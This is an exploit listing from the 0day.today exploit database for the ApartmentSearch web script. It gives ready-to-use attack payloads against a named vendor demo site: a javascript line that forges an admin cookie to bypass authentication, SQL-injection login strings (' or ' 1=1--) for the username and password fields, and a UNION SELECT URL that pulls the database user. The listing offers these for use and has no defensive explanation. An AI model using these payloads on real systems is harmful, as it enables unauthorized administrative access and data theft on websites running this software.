[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ApartmentSearch SQL inject / insecure cookie handling vulnerabilities

Author
JiKo
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10822
Category
web applications
Date add
10-02-2010
Platform
unsorted
========================================================================
ApartmentSearch SQL injection / insecure cookie handling vulnerabilities
========================================================================

[~]-----------|01|
    -{Script}
    name :ApartmentSearch
    link :http://www.ezonescripts.com/productdemos/ApartmentSearch/Site_Admin/admin.php

[~]-----------|02|
    -{3xpl01t}
    javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";
    USer:' or ' 1=1--
    pass:' or ' 1=1--
    http://www.ezonescripts.com/productdemos/ApartmentSearch/listtest.php?r=-1%20union%20select%200,user()--




#  0day.today [2024-10-05]  #